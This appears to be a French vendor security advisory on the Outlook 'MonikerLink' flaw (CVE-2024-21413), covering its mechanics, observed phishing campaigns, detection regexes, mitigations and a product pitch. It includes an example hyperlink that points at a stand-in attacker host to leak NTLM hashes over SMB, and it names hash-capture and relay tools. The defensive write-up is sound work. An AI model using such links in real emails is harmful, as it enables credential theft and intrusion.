CVE-2024-21413 : RCE MonikerLink dans Microsoft Outlook
Surnommée « MonikerLink », CVE-2024-21413 est une vulnérabilité critique de Microsoft Outlook qui contourne la Vue protégée pour parvenir à l'exécution de code à distance et au vol d'identifiants NTLM — simplement en prévisualisant un e-mail malveillant. CVSS 9.8 CRITIQUE. Aucune interaction utilisateur au-delà de la prévisualisation de l'e-mail n'est requise.
| Attribut | Valeur |
|---|---|
| ID CVE | CVE-2024-21413 |
| Vecteur CVSS | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-20 : Validation incorrecte des entrées |
| Publié le | 13 février 2024 |
| Exploitation | PoC publique — largement exploitée |
Qu'est-ce que CVE-2024-21413 ?
CVE-2024-21413 exploite la façon dont Microsoft Outlook traite les hyperliens contenant le caractère ! (point d'exclamation) dans le cadre d'un URI de moniker de fichier. Normalement, Outlook applique la « Vue protégée » aux documents ouverts depuis un e-mail — isolant les documents Office pour empêcher l'exécution de code. Cette vulnérabilité contourne entièrement cette protection.
En créant un hyperlien au format file://ATTACKER-SERVER/test.rtf!something, un attaquant amène Outlook à ouvrir le fichier RTF sans la Vue protégée, tout en déclenchant simultanément une tentative d'authentification NTLM automatique vers le serveur SMB de l'attaquant. L'attaquant capture le hachage NTLMv2 pour le craquer hors ligne ou pour des attaques de relais.
🚨 Attaque via le volet de prévisualisation — Aucun clic requis
Cette vulnérabilité se déclenche dans le volet de prévisualisation d'Outlook. La victime doit seulement sélectionner l'e-mail dans sa boîte de réception — aucune ouverture de pièce jointe ni clic sur un lien n'est nécessaire. Dans un environnement d'entreprise, un seul e-mail de phishing envoyé à une liste de diffusion pourrait compromettre simultanément des centaines de hachages NTLMv2.
Produits concernés
| Produit | Versions concernées |
|---|---|
| Microsoft Outlook 2016 | Avant la mise à jour de février 2024 |
| Microsoft Outlook 2019 | Avant la mise à jour de février 2024 |
| Microsoft Outlook LTSC 2021 | Avant la mise à jour de février 2024 |
| Microsoft 365 Apps for Enterprise | Avant la mise à jour de février 2024 |
Non concerné : Outlook sur le web (OWA), Outlook pour iOS/Android, Outlook pour Mac. La vulnérabilité est spécifique aux clients Outlook de bureau sous Windows.
Mécanique de l'attaque : la technique MonikerLink
Le COM (Component Object Model) de Windows utilise des « monikers » pour lier des objets par leur nom. Le file:// schéma d'URI de Windows peut inclure un composant moniker après le caractère ! , ce qui indique à Windows de charger et d'activer l'objet COM référencé.
# Normal file link — Protected View applied file://attacker.com/share/document.rtf # MonikerLink bypass — ! bypasses Protected View file://attacker.com/share/document.rtf!1337 # When Outlook processes the MonikerLink: # 1. Attempts SMB connection to attacker.com # 2. Sends NTLMv2 authentication (captures hash) # 3. Opens file without Protected View # 4. If file is malicious RTF → RCE
Flux de capture du hachage NTLM
Même sans fichier RTF armé, l'attaque de relais NTLM a un impact important :
- La victime prévisualise l'e-mail malveillant dans Outlook
- Outlook établit automatiquement une connexion SMB vers le serveur contrôlé par l'attaquant
- Windows envoie le défi-réponse NTLMv2 (hachage) pour s'authentifier
- L'attaquant capture le hachage avec Responder, Impacket ou des outils similaires
- Le hachage est craqué hors ligne (mots de passe faibles en quelques heures) ou relayé en temps réel vers d'autres services
Exploitation en situation réelle
Après la publication de la PoC publique, CVE-2024-21413 a été intégrée à des kits de phishing commerciaux en quelques jours. Les campagnes observées comprenaient :
- Collecte d'identifiants en entreprise : E-mails massifs envoyés à des listes de diffusion d'entreprise pour capturer de gros volumes de hachages NTLM
- Accès initial ciblé : Spear-phishing de dirigeants avec des e-mails personnalisés contenant des charges utiles MonikerLink
- Chaînes de mouvement latéral : Relais NTLM depuis les hachages capturés vers des services internes (SMB, LDAP, HTTP)
- Compromission de la messagerie professionnelle : Collecte d'identifiants permettant l'accès aux boîtes mail pour la fraude BEC
Détection
Règles de la passerelle de messagerie
# Regex pattern for MonikerLink in email body/attachments # Detect file:// links containing ! character \bfile:\/\/[^\s"']+![^\s"']* # Block external UNC/file links entirely (recommended) \bfile:\/\/[^\s"']+ \\\\[a-z0-9.-]+\\
Détection réseau
- Connexions SMB depuis des postes de travail vers des adresses IP externes (ne devrait jamais se produire)
- Tentatives d'authentification NTLMv2 vers des adresses IP de destination inattendues
- Requêtes DNS vers des domaines contrôlés par l'attaquant depuis les clients de messagerie
Détection sur les postes
- OUTLOOK.EXE initiant des connexions sortantes TCP/445
- Un processus Office générant des processus enfants après la prévisualisation d'un e-mail
- Accès à LSASS depuis des processus Office
Atténuation
- Appliquer les correctifs de février 2024 : La mise à jour de sécurité Microsoft pour Outlook corrige le contournement de la Vue protégée
- Bloquer le trafic SMB sortant au périmètre : Des règles de pare-feu bloquant le trafic sortant TCP/445 et TCP/139 empêchent la capture de hachages NTLM même si la vulnérabilité se déclenche
- Activer les protections contre le relais NTLM : Configurer la signature SMB et la signature LDAP pour empêcher les attaques de relais
- Déployer une passerelle de sécurité de messagerie : Bloquer les e-mails contenant des liens
file://et\\(chemin UNC) dans le corps et les pièces jointes - Désactiver NTLM lorsque c'est possible : Les organisations utilisant Kerberos peuvent désactiver NTLM pour éliminer ce vecteur d'attaque de capture de hachage
💡 Défense en profondeur : Même si vous avez corrigé Outlook, bloquer le trafic SMB sortant au niveau du pare-feu est une bonne pratique qui empêche toute cette classe d'attaques. De nombreuses organisations autorisent le trafic SMB sortant pour des raisons de partage de fichiers hérité — auditez et restreignez cela immédiatement.
Capacité de détection KENSAI
- Inventaire des versions du client de messagerie : KENSAI identifie les versions d'Outlook dans toute votre organisation, en signalant les versions non corrigées vulnérables à CVE-2024-21413
- Simulation de phishing : Le module d'évaluation du phishing de KENSAI peut tester la susceptibilité des employés aux leurres de type MonikerLink
- Analyse de l'exposition réseau : Identifie les pare-feu mal configurés autorisant le trafic SMB sortant depuis les postes de travail
- Conformité des correctifs : Surveillance continue des niveaux de correctifs de Microsoft Office par rapport à la couverture des CVE connues
Vos clients Outlook sont-ils protégés contre MonikerLink ?
KENSAI analyse votre parc de postes à la recherche de versions vulnérables d'Outlook et identifie les chemins réseau qui permettraient la capture de hachages NTLM. Obtenez une visibilité en quelques minutes.
Évaluez la surface d'attaque de votre messagerie →